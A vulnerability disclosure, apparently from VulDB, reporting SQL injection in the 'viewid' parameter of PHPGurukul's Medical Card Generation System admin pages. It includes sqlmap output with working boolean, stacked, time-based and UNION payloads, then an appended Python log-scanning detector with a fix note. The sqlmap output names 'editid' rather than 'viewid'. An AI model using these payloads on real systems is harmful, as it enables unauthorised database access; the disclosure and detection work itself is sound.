| Title | PHPGurukul Medical Card Generation System - viewid Parameter V1.0 SQL Injection |
|---|
| Description | I would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing.
Details:
Affected URL/Endpoint: /mcgs/admin/view-card-detail.php?viewid=1, /mcgs/admin/view-enquiry.php?viewid=1
Vulnerable Parameter: 'viewid'
Risk Level: High (allows malicious users to execute arbitrary SQL queries)
Steps to reproduce:
1) Sign in as admin.
2) Navigate to Managecard > Action 'View'
3) Use a proxy like Burp Suite to intercept the request.
4) Input the payload to invoke the SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: editid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: editid=1 AND 3139=3139
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: editid=1;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[11:02:51] [INFO] the back-end DBMS is MySQL
[11:02:51] [INFO] fetching banner
web application technology: Apache 2.4.59, PHP 8.2.18
back-end DBMS: MySQL >= 5.0.12
banner: '8.3.0'
[11:02:51] [INFO] fetching current user
current user: 'root@localhost'
[11:02:51] [INFO] fetching current database
current database: 'mgsdb'
Please let me know if you need further information or a more detailed analysis. |
|---|
| User | Delvy (UID 74555) |
|---|
| Submission | 2024. 10. 21. AM 05:03 (2 years ago) |
|---|
| Moderation | 2024. 10. 23. PM 01:05 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 281567 [PHPGurukul Medical Card Generation System 1.0 View Enquiry Page /admin/view-enquiry.php viewid SQL Injection] |
|---|
| Points | 17 |
|---|
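
A detection check for the endpoints named in this submission, added here as an example and not part of the report or of the PHPGurukul code: it scans web server access-log lines for requests to the two affected pages whose `viewid` (or `editid`, the name shown in the sqlmap output) is not a plain integer. It assumes Apache common/combined log format; the function name, the sample log lines, the IP addresses and the `dashboard.php` path are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints and parameter names taken from the report above.
WATCHED_PATHS = {
    "/mcgs/admin/view-card-detail.php",
    "/mcgs/admin/view-enquiry.php",
}
ID_PARAMS = {"viewid", "editid"}

# Assumed Apache common/combined log layout: ip - - [timestamp] "METHOD target PROTO" ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

def non_numeric_id_requests(log_lines):
    """Return (ip, timestamp, param, decoded_value) for each request to a
    watched page whose id parameter is anything other than ASCII digits."""
    findings = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        url = urlsplit(m.group("target"))
        if url.path not in WATCHED_PATHS:
            continue
        # parse_qsl percent-decodes values, so encoded payloads are compared in clear.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in ID_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings.append((m.group("ip"), m.group("ts"), name, value))
    return findings

# Constructed sample log lines; the two payloads are the ones quoted in the report.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Oct/2024:11:02:40 +0000] "GET /mcgs/admin/view-card-detail.php?viewid=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Oct/2024:11:02:51 +0000] "GET /mcgs/admin/view-enquiry.php?viewid=1%20AND%203139%3D3139 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Oct/2024:11:02:52 +0000] "GET /mcgs/admin/view-card-detail.php?editid=1%3BSELECT%20SLEEP(5)%23 HTTP/1.1" 200 5120',
    '198.51.100.4 - - [21/Oct/2024:11:03:00 +0000] "GET /mcgs/admin/dashboard.php?viewid=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, ts, param, value in non_numeric_id_requests(SAMPLE_LOG):
        print(f"{ts} {ip} {param}={value!r}")
```

The same digits-only rule, applied server-side before the value reaches the query (together with a parameterized statement), is the corresponding fix for the reported parameter.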